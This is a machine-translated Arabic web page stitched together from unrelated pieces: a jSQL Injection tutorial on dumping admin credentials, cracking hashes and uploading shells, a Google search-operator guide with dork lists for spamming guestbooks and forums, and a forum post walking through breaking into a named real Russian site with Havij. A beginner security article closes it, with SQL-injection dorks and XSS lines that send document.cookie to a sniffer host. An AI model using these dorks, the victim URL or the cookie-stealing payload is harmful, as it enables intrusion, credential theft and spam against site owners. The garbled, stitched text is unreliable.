تعليمات لاستخدام حقن jSQL، وهي أداة متعددة الوظائف للعثور على حقن SQL واستغلالها في Kali Linux. تعليمات لاستخدام حقن jSQL - أداة متعددة الوظائف للبحث عن حقن SQL واستغلالها في Kali Linux

بيت / يتجمد

قم بتشغيل الملف الذي تم تنزيله بالنقر المزدوج (يجب أن يكون لديك الآلة الافتراضية ).

3. عدم الكشف عن هويته عند التحقق من موقع ما لحقن SQL
إعداد تورو بريفوكسي في كالي لينكس

[القسم قيد التطوير]

إعداد Tor وPrivoxy على نظام التشغيل Windows

[القسم قيد التطوير]

إعدادات الوكيل في حقن جي إس كيو إل

[القسم قيد التطوير]

4. التحقق من الموقع لحقن SQL باستخدام حقن jSQL

العمل مع البرنامج بسيط للغاية. فقط أدخل عنوان الموقع واضغط على ENTER.

توضح لقطة الشاشة التالية أن الموقع عرضة لثلاثة أنواع من عمليات حقن SQL (المعلومات المتعلقة بها موضحة في الزاوية اليمنى السفلية). بالضغط على أسماء الحقن يمكنك تبديل الطريقة المستخدمة:

كما تم بالفعل عرض قواعد البيانات الموجودة لنا.

يمكنك الاطلاع على محتويات كل جدول:

عادة، الشيء الأكثر إثارة للاهتمام حول الجداول هو بيانات اعتماد المسؤول.

إذا كنت محظوظًا وعثرت على بيانات المسؤول، فمن السابق لأوانه أن تفرح. لا تزال بحاجة إلى العثور على لوحة الإدارة حيث يمكنك إدخال هذه البيانات.

5. ابحث عن لوحات الإدارة باستخدام jSQL حقن

للقيام بذلك، انتقل إلى علامة التبويب التالية. هنا يتم الترحيب بنا بقائمة من العناوين المحتملة. يمكنك تحديد صفحة واحدة أو أكثر للتحقق منها:

تكمن الراحة في أنك لا تحتاج إلى استخدام برامج أخرى.

لسوء الحظ، لا يوجد الكثير من المبرمجين المهملين الذين يقومون بتخزين كلمات المرور بنص واضح. في كثير من الأحيان نرى شيئًا كهذا في سطر كلمة المرور

8743b52063cd84097a65d1633f5c74f5

هذا هو التجزئة. يمكنك فك تشفيرها باستخدام القوة الغاشمة. و... يحتوي jSQL حقن على قوة غاشمة مدمجة.

6. تجزئة القوة الغاشمة باستخدام حقن jSQL

الراحة التي لا شك فيها هي أنك لا تحتاج إلى البحث عن برامج أخرى. هناك دعم للعديد من التجزئة الأكثر شعبية.

هذا ليس الأكثر الخيار الأفضل. لكي تصبح خبيرًا في فك رموز التجزئة، يوصى بكتاب "" باللغة الروسية.

ولكن، بالطبع، عندما لا يكون هناك برنامج آخر في متناول اليد أو عندما لا يكون هناك وقت للدراسة، فإن حقن jSQL مع وظيفة القوة الغاشمة المضمنة فيه سيكون مفيدًا للغاية.

هناك إعدادات: يمكنك ضبط الأحرف المضمنة في كلمة المرور، ونطاق طول كلمة المرور.

7. عمليات الملف بعد الكشف عن حقن SQL

بالإضافة إلى العمليات مع قواعد البيانات - قراءتها وتعديلها، إذا تم اكتشاف حقن SQL، فيمكن إجراء عمليات الملف التالية:

  • قراءة الملفات على الخادم
  • تحميل ملفات جديدة إلى الخادم
  • تحميل قذائف إلى الخادم

ويتم تنفيذ كل هذا في حقن jSQL!

هناك قيود - يجب أن يتمتع خادم SQL بامتيازات الملف. العقلاء مسؤولي النظاميتم تعطيلهم والوصول إليها نظام الملفاتلن تكون قادرة على الحصول عليه.

من السهل جدًا التحقق من وجود امتيازات الملف. انتقل إلى إحدى علامات التبويب (قراءة الملفات، إنشاء غلاف، تحميل ملف جديد) وحاول تنفيذ إحدى العمليات المحددة.

لا يزال جدا ملاحظة مهمة- نحتاج إلى معرفة المسار المطلق الدقيق للملف الذي سنعمل به - وإلا فلن ينجح شيء.

انظر إلى لقطة الشاشة التالية:

في حالة أي محاولة للعمل على ملف، يتم الرد علينا: لا توجد امتيازات للملف (لا توجد امتيازات للملف). ولا يمكن فعل أي شيء هنا.

إذا كان لديك خطأ آخر بدلاً من ذلك:

مشكلة في الكتابة في [directory_name]

هذا يعني أنك قمت بتحديد المسار المطلق بشكل غير صحيح حيث تريد كتابة الملف.

من أجل تخمين المسار المطلق، عليك أن تعرف على الأقل نظام التشغيلالذي يعمل عليه الخادم. للقيام بذلك، قم بالتبديل إلى علامة التبويب "الشبكة".

هذا الإدخال (سطر Win64) يعطينا سببًا لافتراض أننا نتعامل مع نظام التشغيل Windows:

البقاء على قيد الحياة: المهلة = 5، الحد الأقصى = 99 الخادم: Apache/2.4.17 (Win64) PHP/7.0.0RC6 الاتصال: طريقة البقاء على قيد الحياة: HTTP/1.1 200 OK طول المحتوى: 353 التاريخ: الجمعة، 11 ديسمبر 2015 11:48:31 بتوقيت جرينتش X-Powered-By: PHP/7.0.0RC6 نوع المحتوى: نص/html؛ مجموعة الأحرف = UTF-8

هنا لدينا بعض يونكس (*BSD، Linux):

ترميز النقل: مقسم التاريخ: الجمعة، 11 ديسمبر 2015 الساعة 11:57:02 بتوقيت جرينتش الطريقة: HTTP/1.1 200 موافق البقاء على قيد الحياة: المهلة = 3، الحد الأقصى = 100 الاتصال: نوع المحتوى المستمر: نص/html X- مدعوم من: PHP/5.3.29 الخادم: Apache/2.2.31 (يونكس)

وهنا لدينا CentOS:

الطريقة: HTTP/1.1 200 OK انتهاء الصلاحية: الخميس، 19 نوفمبر 1981 الساعة 08:52:00 بتوقيت جرينتش Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; المسار=/ الاتصال: البحث المستمر عن X-Cache: MISS من t1.hoster.ru:6666 الخادم: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS من t1.hoster.ru التحكم في ذاكرة التخزين المؤقت: لا يوجد تخزين، لا توجد ذاكرة تخزين مؤقت، يجب إعادة التحقق، ما بعد الفحص = 0، فحص مسبق = 0 براغما: لا يوجد ذاكرة تخزين مؤقت التاريخ: الجمعة، 11 ديسمبر 2015 12:08:54 بتوقيت جرينتش ترميز النقل: نوع المحتوى المقسم: نص/html؛ مجموعة الأحرف = WINDOWS-1251

على نظام التشغيل Windows، المجلد النموذجي للمواقع هو C:\Server\data\htdocs\ . ولكن، في الواقع، إذا "فكر" شخص ما في إنشاء خادم على نظام Windows، فمن المحتمل جدًا أن هذا الشخص لم يسمع شيئًا عن الامتيازات. لذلك، يجب أن تبدأ بالمحاولة مباشرة من الدليل C:/Windows/:

كما ترون، كل شيء سار على ما يرام في المرة الأولى.

لكن قذائف jSQL حقن نفسها تثير الشكوك في ذهني. إذا كانت لديك امتيازات الملف، فيمكنك بسهولة تحميل شيء ما باستخدام واجهة الويب.

8. فحص جماعي للمواقع من أجل حقن SQL

وحتى هذه الوظيفة متاحة في حقن jSQL. كل شيء بسيط للغاية - قم بتنزيل قائمة المواقع (يمكنك الاستيراد من ملف)، وحدد المواقع التي تريد التحقق منها وانقر فوق الزر المناسب لبدء العملية.

الاستنتاج من حقن jSQL

حقن jSQL جيد، أداة قويةللبحث ثم استخدام حقن SQL الموجودة على مواقع الويب. مزاياها التي لا شك فيها: سهولة الاستخدام، مدمجة الوظائف ذات الصلة. يمكن أن يكون حقن jSQL أفضل صديق للمبتدئين عند تحليل مواقع الويب.

من بين أوجه القصور، أود أن أشير إلى استحالة تحرير قواعد البيانات (على الأقل لم أجد هذه الوظيفة). مثل جميع الأدوات مع واجهة رسومية، يمكن أن يعزى أحد عيوب هذا البرنامج إلى عدم القدرة على استخدامه في البرامج النصية. ومع ذلك، فإن بعض الأتمتة ممكنة أيضًا في هذا البرنامج - بفضل الوظيفة المدمجة لفحص الموقع الشامل.

يعد برنامج jSQL حقن أكثر ملاءمة للاستخدام من sqlmap. لكن sqlmap يدعم المزيد من أنواع حقن SQL، ولديه خيارات للعمل مع جدران حماية الملفات وبعض الوظائف الأخرى.

خلاصة القول: حقن jSQL - أفضل صديقالقراصنة المبتدئين.

يمكن العثور على المساعدة لهذا البرنامج في موسوعة كالي لينكس على هذه الصفحة: http://kali.tools/?p=706

كيفية البحث بشكل صحيح باستخدام google.com

ربما يعرف الجميع كيفية استخدام هذا محرك بحث، مثل Google =) ولكن لا يعلم الجميع أنه إذا قمت بتأليفها بشكل صحيح استعلام البحثبمساعدة التصميمات الخاصة، يمكنك تحقيق نتائج ما تبحث عنه بشكل أكثر كفاءة وسرعة =) في هذه المقالة سأحاول إظهار ما يجب عليك فعله وكيف يجب عليك القيام به للبحث بشكل صحيح

تدعم Google العديد من عوامل تشغيل البحث المتقدم التي لها معنى خاص عند البحث على google.com. عادةً ما يقوم هؤلاء المشغلون بتغيير البحث، أو حتى يطلبون من Google القيام بذلك بالكامل أنواع مختلفةيبحث. على سبيل المثال، الرابط: البناء هو عامل خاص، والطلب الرابط :www.google.comلن يقدم لك بحثًا عاديًا، ولكنه سيجد بدلاً من ذلك جميع صفحات الويب التي تحتوي على روابط إلى google.com.
أنواع الطلبات البديلة

ذاكرة التخزين المؤقت: إذا قمت بتضمين كلمات أخرى في استعلام، فسيقوم Google بتمييز تلك الكلمات المضمنة في المستند المخبأ.
على سبيل المثال، ذاكرة التخزين المؤقت: موقع www.webسيعرض المحتوى المخزن مؤقتًا مع تمييز كلمة "الويب".

الرابط: سيعرض استعلام البحث أعلاه صفحات الويب التي تحتوي على روابط للاستعلام المحدد.
على سبيل المثال: الرابط: www.siteسيتم عرض جميع الصفحات التي تحتوي على رابط إلى http://www.site

ذات صلة: يعرض صفحات الويب "ذات الصلة" بصفحة الويب المحددة.
على سبيل المثال، ذات صلة: www.google.comسيتم سرد صفحات الويب المتشابهة الصفحة الرئيسيةجوجل.

معلومات: معلومات الطلب: سيعرض بعض المعلومات التي لدى Google حول صفحة الويب التي تطلبها.
على سبيل المثال، معلومات: الموقعسوف تظهر معلومات حول منتدانا =) (أرمادا - منتدى مشرفي المواقع للبالغين).

طلبات المعلومات الأخرى

تعريف: سيوفر الاستعلام تعريفًا للكلمات التي تدخلها بعده، والتي تم جمعها من مصادر مختلفة عبر الإنترنت. سيكون التعريف مخصصًا للعبارة التي تم إدخالها بالكامل (أي أنه سيتضمن جميع الكلمات في الاستعلام الدقيق).

الأسهم: إذا بدأت استعلامًا بالأسهم: فسيقوم Google بمعالجة بقية مصطلحات الاستعلام كرموز للأسهم، وسيربطها بصفحة تعرض معلومات جاهزة لهذه الرموز.
على سبيل المثال، الأسهم: إنتل ياهوسوف تظهر معلومات حول إنتل وياهو. (لاحظ أنه يجب كتابة رموز الأخبار العاجلة وليس اسم الشركة)

معدّلات الاستعلام

site: إذا قمت بتضمين site: في استعلامك، فسوف يقتصر Google على النتائج على مواقع الويب التي يجدها في هذا النطاق.
يمكنك أيضًا البحث حسب المناطق الفردية، مثل ru وorg وcom وما إلى ذلك ( الموقع:كوم الموقع:ru)

allintitle: إذا قمت بتشغيل استعلام باستخدام allintitle:، فسيقوم Google بقصر النتائج على جميع كلمات الاستعلام الموجودة في العنوان.
على سبيل المثال، العنوان: بحث جوجل سيعرض جميع صفحات Google حسب البحث مثل الصور والمدونة وما إلى ذلك

intitle: إذا قمت بتضمين intitle: في استعلامك، فسيقوم Google بقصر النتائج على المستندات التي تحتوي على تلك الكلمة في العنوان.
على سبيل المثال، العنوان: الأعمال

allinurl: إذا قمت بتشغيل استعلام باستخدام allinurl: فسيقوم Google بقصر النتائج على جميع كلمات الاستعلام في عنوان URL.
على سبيل المثال، ألينورل: بحث جوجلسيعود المستندات مع جوجل والبحث في العنوان. أيضًا، كخيار، يمكنك فصل الكلمات بشرطة مائلة (/) ثم سيتم البحث عن الكلمات الموجودة على جانبي الشرطة المائلة داخل نفس الصفحة: مثال ألينورل: فو/بار

inurl: إذا قمت بتضمين inurl: في استعلامك، فسيقوم Google بقصر النتائج على المستندات التي تحتوي على تلك الكلمة في عنوان URL.
على سبيل المثال، عنوان URL للرسوم المتحركة: الموقع

intext: يبحث فقط في الكلمة المحددة في نص الصفحة، متجاهلاً العنوان ونصوص الارتباط، والأشياء الأخرى التي لا تتعلق بها. يوجد أيضًا مشتق من هذا المعدل - allintext: أي. علاوة على ذلك، سيتم البحث عن جميع الكلمات في الاستعلام في النص فقط، وهو ما قد يكون مهمًا أيضًا، مع تجاهل الكلمات المستخدمة بشكل متكرر في الروابط
على سبيل المثال، النص: المنتدى

نطاق التاريخ: البحث ضمن إطار زمني (نطاق التاريخ:2452389-2452389)، تواريخ الأوقات بالتنسيق الجولياني.

حسنا، وجميع أنواع الأمثلة المثيرة للاهتمام من الاستعلامات

أمثلة على كتابة الاستعلامات لجوجل. لمرسلي البريد العشوائي

Inurl:control.guest?a=sign

الموقع: books.dreambook.com "عنوان URL للصفحة الرئيسية" "Sign my" inurl:sign

الموقع: www.freegb.net الصفحة الرئيسية

Inurl:sign.asp "عدد الأحرف"

"الرسالة:" inurl:sign.cfm "المرسل:"

Inurl:register.php "تسجيل المستخدم" "الموقع الإلكتروني"

Inurl:edu/guestbook "وقع في سجل الزوار"

Inurl: نشر "نشر تعليق" "URL"

Inurl:/archives/ "التعليقات:" "هل تتذكر المعلومات؟"

"تم إنشاء البرنامج النصي وسجل الزوار بواسطة:" "عنوان URL:" "التعليقات:"

Inurl:?action=add “phpBook” “URL”

العنوان: "أرسل قصة جديدة"

المجلات

Inurl:www.livejournal.com/users/mode=reply

Inurl greatjournal.com/ mode=reply

inurl:fastbb.ru/re.pl؟

Inurl:fastbb.ru /re.pl؟ "سجل الزوار"

مدونات

Inurl:blogger.com/comment.g؟"postID""مجهول"

Inurl:typepad.com/ "أضف تعليقًا" "هل تتذكر المعلومات الشخصية؟"

Inurl:greatestjournal.com/community/ "نشر التعليق" "عناوين الملصقات المجهولة"

"نشر التعليق" "عناوين الملصقات المجهولة" -

العنوان:"أضف تعليقًا"

Inurl:pirillo.com "نشر التعليق"

المنتديات

Inurl:gate.html؟"الاسم=المنتديات" "الوضع=الرد"

Inurl:"forum/posting.php?mode=reply"

inurl:"mes.php؟"

عنوان URL: "أعضاء.html"

Inurl:forum/memberlist.php؟"

والآن سأخبرك بكيفية اختراق شيء ما دون أي معرفة خاصة. سأقول على الفور أن هناك فائدة قليلة من هذا، ولكن لا يزال.
أولاً، عليك أن تجد المواقع نفسها. للقيام بذلك، انتقل إلى google.com وابحث عن dorks

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: Select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl: memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: Offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

هنا قائمة صغيرة. يمكنك استخدام لك. وهكذا وجدنا الموقع. على سبيل المثال http://www.vestitambov.ru/
بعد ذلك، قم بتنزيل هذا البرنامج

**المحتوى المخفي: لرؤية هذا المحتوى المخفي، يجب أن يكون عدد مشاركاتك 3 أو أكثر.**

انقر فوق موافق. ثم نقوم بإدخال موقع الضحية.
نضغط على ابدأ. وبعد ذلك ننتظر النتائج.
وهكذا، اكتشف البرنامج ثغرة أمنية في SQL.

بعد ذلك، قم بتنزيل Havij، http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= الصق الرابط المستلم هناك. لن أشرح كيفية استخدام Havij ومكان تنزيله؛ ليس من الصعب العثور عليه. الجميع. لقد تلقيت البيانات التي تحتاجها - كلمة مرور المسؤول، والأمر متروك لخيالك.

ملاحظة: هذه هي محاولتي الأولى لكتابة شيء ما. آسف إذا كان هناك شيء خاطئ

قررت أن أتحدث قليلا عنه أمن المعلومات. ستكون المقالة مفيدة للمبرمجين المبتدئين وأولئك الذين بدأوا للتو في تطوير الواجهة الأمامية. ما هي المشكلة؟

ينجرف العديد من المطورين المبتدئين في كتابة التعليمات البرمجية لدرجة أنهم ينسون تمامًا أمان عملهم. والأهم من ذلك أنهم ينسون نقاط الضعف مثل استعلامات SQL وXXS. كما أنهم يبتكرون كلمات مرور سهلة للوحاتهم الإدارية ويتعرضون للقوة الغاشمة. ما هي هذه الهجمات وكيف يمكنك تجنبها؟

حقن SQL

يعد حقن SQL هو النوع الأكثر شيوعًا من الهجمات على قاعدة البيانات، والذي يتم تنفيذه أثناء استعلام SQL لنظام إدارة قواعد بيانات محدد. كثير من الناس وحتى الشركات الكبيرة يعانون من مثل هذه الهجمات. السبب هو خطأ في المطور عند كتابة قاعدة البيانات، وبالمعنى الدقيق للكلمة، استعلامات SQL.

من الممكن حدوث هجوم حقن SQL بسبب المعالجة غير الصحيحة لبيانات الإدخال المستخدمة في استعلامات SQL. إذا نجح هجوم المتسللين، فإنك لا تخاطر بفقدان محتويات قواعد البيانات فحسب، بل أيضًا كلمات المرور وسجلات اللوحة الإدارية. وستكون هذه البيانات كافية للسيطرة على الموقع بالكامل أو إجراء تعديلات لا رجعة فيها عليه.

يمكن إعادة إنتاج الهجوم بنجاح في نصوص مكتوبة بلغات PHP وASP وPerl ولغات أخرى. يعتمد نجاح مثل هذه الهجمات بشكل أكبر على نظام إدارة قواعد البيانات المستخدم وكيفية تنفيذ البرنامج النصي نفسه. هناك العديد من المواقع الضعيفة لحقن SQL في العالم. وهذا من السهل التحقق منه. ما عليك سوى إدخال "dorks" - وهي استعلامات خاصة للبحث عن المواقع المعرضة للخطر. وهنا بعض منها:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

كيفية استخدامها؟ ما عليك سوى إدخالها في محرك بحث Google أو Yandex. لن يوفر لك محرك البحث موقعًا ضعيفًا فحسب، بل سيوفر لك أيضًا صفحة حول هذه الثغرة الأمنية. لكننا لن نتوقف عند هذا الحد ونتأكد من أن الصفحة معرضة للخطر حقًا. للقيام بذلك، يكفي أن نضع بعد القيمة “id=1” اقتباس واحد""". شيء من هذا القبيل:

  • inurl:games.php?id=1'

وسيعطينا الموقع خطأً بشأنه استعلام SQL. ماذا يحتاج المتسلل لدينا بعد ذلك؟

وبعد ذلك يحتاج إلى هذا الرابط بالذات لصفحة الخطأ. ثم يتم العمل على الثغرة الأمنية في معظم الحالات في توزيعة "Kali linux" مع أدواتها المساعدة لهذا الجزء: إدخال كود الحقن وإجراء العمليات اللازمة. كيف سيحدث هذا، لا أستطيع أن أخبرك. ولكن يمكنك العثور على معلومات حول هذا على الإنترنت.

هجوم XSS

يتم تنفيذ هذا النوع من الهجوم ملفات تعريف الارتباط. ويحب المستخدمون بدورهم حفظها. ولم لا؟ ماذا سنفعل بدونهم؟ بعد كل شيء، بفضل ملفات تعريف الارتباط، لا يتعين علينا إدخال كلمة المرور الخاصة بـ Vk.com أو Mail.ru مائة مرة. وهناك عدد قليل من الذين يرفضونهم. ولكن غالبًا ما تظهر قاعدة للمتسللين على الإنترنت: يتناسب معامل الملاءمة بشكل مباشر مع معامل عدم الأمان.

لتنفيذ هجوم XSS، يحتاج المتسلل لدينا إلى معرفة JavaScript. للوهلة الأولى، اللغة بسيطة للغاية وغير ضارة، لأنها لا تستطيع الوصول إلى موارد الكمبيوتر. يمكن للمتسلل العمل فقط مع JavaScript في المتصفح، ولكن هذا يكفي. بعد كل شيء، الشيء الرئيسي هو إدخال الرمز في صفحة الويب.

لن أتحدث بالتفصيل عن عملية الهجوم. سأخبرك فقط بالأساسيات والمعنى لكيفية حدوث ذلك.

يمكن للمتسلل إضافة كود JS إلى بعض المنتديات أو دفتر الزوار:

document.location.href =”http://192.168.1.7/sniff.php?test”

ستعيدنا البرامج النصية إلى الصفحة المصابة، حيث سيتم تنفيذ التعليمات البرمجية: سواء كانت أداة شم، أو نوع من التخزين أو استغلال، والذي سوف يسرق بطريقة أو بأخرى ملفات تعريف الارتباط الخاصة بنا من ذاكرة التخزين المؤقت.

لماذا جافا سكريبت؟ لأن JavaScript رائع في التعامل مع طلبات الويب ولديه حق الوصول إلى ملفات تعريف الارتباط. ولكن إذا أخذنا البرنامج النصي الخاص بنا إلى موقع ما، فسوف يلاحظه المستخدم بسهولة. هنا يستخدم المتسلل خيارًا أكثر ذكاءً - فهو ببساطة يُدخل الرمز في الصورة.

Img=new Image();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

نحن ببساطة ننشئ صورة ونخصص لها البرنامج النصي كعنوان.

كيف تحمي نفسك من كل هذا؟ الأمر بسيط جدًا - لا تنقر على الروابط المشبوهة.

هجمات DoS و DDos

DoS (من رفض الخدمة باللغة الإنجليزية - الحرمان من الخدمة) - هجوم القراصنةعلى نظام الكمبيوترمن أجل أن يقودها إلى الفشل. هذا هو خلق الظروف التي بموجبها لا يتمكن مستخدمو النظام الحقيقيون من الوصول إلى ما تم توفيره موارد النظام(الخوادم)، أو أن هذا الوصول صعب. يمكن أن يكون فشل النظام أيضًا خطوة نحو الاستيلاء عليه، إذا قام البرنامج في حالة الطوارئ بإنتاج أي معلومات مهمة: على سبيل المثال، الإصدار، الجزء رمز البرنامجإلخ. ولكن في أغلب الأحيان يكون هذا مقياسًا للضغط الاقتصادي: فقدان خدمة بسيطة تدر الدخل. الفواتير الصادرة من المزود أو التدابير اللازمة لتجنب الهجوم تصيب بشكل كبير "الهدف" في الجيب حاليًا، تعد هجمات DoS و DDoS هي الأكثر شيوعًا، لأنها تسمح بفشل أي نظام تقريبًا دون ترك أدلة مهمة من الناحية القانونية.

ما الفرق بين هجوم DoS وهجوم DDos؟

DoS هو هجوم مصمم بطريقة ذكية. على سبيل المثال، إذا لم يتحقق الخادم من صحة الحزم الواردة، فيمكن للمتسلل تقديم طلب ستستغرق معالجته وقتًا طويلاً، ولن يكون هناك وقت كافٍ للمعالج للعمل مع الاتصالات الأخرى. وبناء على ذلك، سيتم حرمان العملاء من الخدمة. لكن لن يكون من الممكن التحميل الزائد أو تعطيل المواقع الكبيرة المعروفة بهذه الطريقة. إنهم مسلحون بقنوات واسعة إلى حد ما وخوادم فائقة القوة يمكنها التعامل مع هذا الحمل الزائد دون أي مشاكل.

DDoS هو في الواقع نفس هجوم DoS. ولكن إذا كانت هناك حزمة طلب واحدة في DoS، فقد يكون هناك مئات منها أو أكثر في DDoS. حتى الخوادم فائقة القوة قد لا تكون قادرة على التعامل مع مثل هذا الحمل الزائد. دعني أعطيك مثالا.

يحدث هجوم DoS عندما تجري محادثة مع شخص ما، ولكن بعد ذلك يأتي شخص سيئ الأخلاق ويبدأ بالصراخ بصوت عالٍ. من المستحيل أو من الصعب جدًا التحدث. الحل: اتصل بالأمن الذي سيهدأ ويخرج الشخص من المبنى. تحدث هجمات DDoS عندما يندفع حشد من الآلاف من هؤلاء الأشخاص ذوي السلوك السيئ. وفي هذه الحالة لن يتمكن الأمن من تقييد الجميع وأخذهم بعيداً.

يتم تنفيذ DoS وDDoS من أجهزة الكمبيوتر، ما يسمى بالزومبي. هذه هي أجهزة الكمبيوتر الخاصة بالمستخدمين التي اخترقها المتسللون الذين لا يشكون حتى في أن أجهزتهم تشارك في هجوم على أي خادم.

كيف تحمي نفسك من هذا؟ بشكل عام، بأي حال من الأحوال. ولكن يمكنك جعل الأمور أكثر صعوبة بالنسبة للمتسلل. للقيام بذلك تحتاج إلى تحديد استضافة جيدةمع خوادم قوية.

هجوم القوة الغاشمة

يمكن للمطور ابتكار الكثير من أنظمة الحماية من الهجمات، ومراجعة البرامج النصية التي كتبناها بشكل كامل، والتحقق من نقاط الضعف في الموقع، وما إلى ذلك. ولكن عندما يتعلق الأمر الخطوة الأخيرةتخطيط الموقع، أي عندما يقوم ببساطة بوضع كلمة مرور على لوحة الإدارة، فقد ينسى شيئًا واحدًا. كلمة المرور!

لا يوصى بشدة بتعيين كلمة مرور بسيطة. يمكن أن يكون هذا 12345، 1114457، vasya111، وما إلى ذلك. لا يوصى بتعيين كلمات مرور أقل من 10-11 حرفًا. بخلاف ذلك، قد تتعرض للهجوم الأكثر شيوعًا وغير المعقد - القوة الغاشمة.

القوة الغاشمة هي هجوم باستخدام كلمة مرور القاموس برامج خاصة. يمكن أن تكون القواميس مختلفة: لاتينية، وتعداد بالأرقام، دعنا نقول حتى نطاق معين، ومختلطة (لاتينية + أرقام)، وهناك أيضًا قواميس بأحرف فريدة @#4$%&*~~`''\ ? إلخ.

وبطبيعة الحال، من السهل تجنب هذا النوع من الهجمات، ما عليك سوى ابتكار كلمة مرور معقدة. حتى كلمة التحقق يمكن أن تنقذك. أيضًا، إذا كان موقعك مصنوعًا على نظام إدارة المحتوى (CMS)، فإن العديد منهم يكتشفون هذا النوع من الهجمات ويحظرون عنوان IP. يجب أن تتذكر دائمًا أنه كلما زاد عدد الأحرف المختلفة في كلمة المرور، أصبح من الصعب تخمينها.

كيف يعمل الهاكرز؟ في معظم الحالات، إما أنهم يشتبهون أو يعرفون جزءًا من كلمة المرور مسبقًا. من المنطقي تمامًا افتراض أن كلمة مرور المستخدم لن تتكون بالتأكيد من 3 أو 5 أحرف. تؤدي كلمات المرور هذه إلى عمليات قرصنة متكررة. في الأساس، يأخذ المتسللون نطاقًا من 5 إلى 10 أحرف ويضيفون عدة أحرف قد يعرفونها مسبقًا. بعد ذلك، يتم إنشاء كلمات المرور ذات النطاقات المطلوبة. يحتوي توزيع Kali Linux أيضًا على برامج لمثل هذه الحالات. وفويلا، لن يستمر الهجوم طويلا، لأن حجم القاموس لم يعد كبيرا جدا. بالإضافة إلى ذلك، يمكن للمتسلل استخدام قوة بطاقة الفيديو. بعضها يدعم نظام CUDA، وتزيد سرعة البحث بما يصل إلى 10 مرات. والآن نرى أن الهجوم بهذا الشكل بطريقة بسيطةحقيقي تماما. لكن ليست مواقع الويب وحدها هي التي تخضع للقوة الغاشمة.

أعزائي المطورين، لا تنسوا أبدًا نظام أمن المعلومات، لأن الكثير من الأشخاص، بما في ذلك الدول، يعانون اليوم من مثل هذه الأنواع من الهجمات. بعد كل شيء، أكبر نقطة ضعف هي الشخص الذي يمكن دائمًا تشتيت انتباهه في مكان ما أو تفويت شيء ما. نحن مبرمجون، ولكننا لسنا آلات مبرمجة. كن على أهبة الاستعداد دائمًا، لأن فقدان المعلومات يمكن أن يكون له عواقب وخيمة!

© 2024 ermake.ru - حول إصلاح أجهزة الكمبيوتر - بوابة المعلومات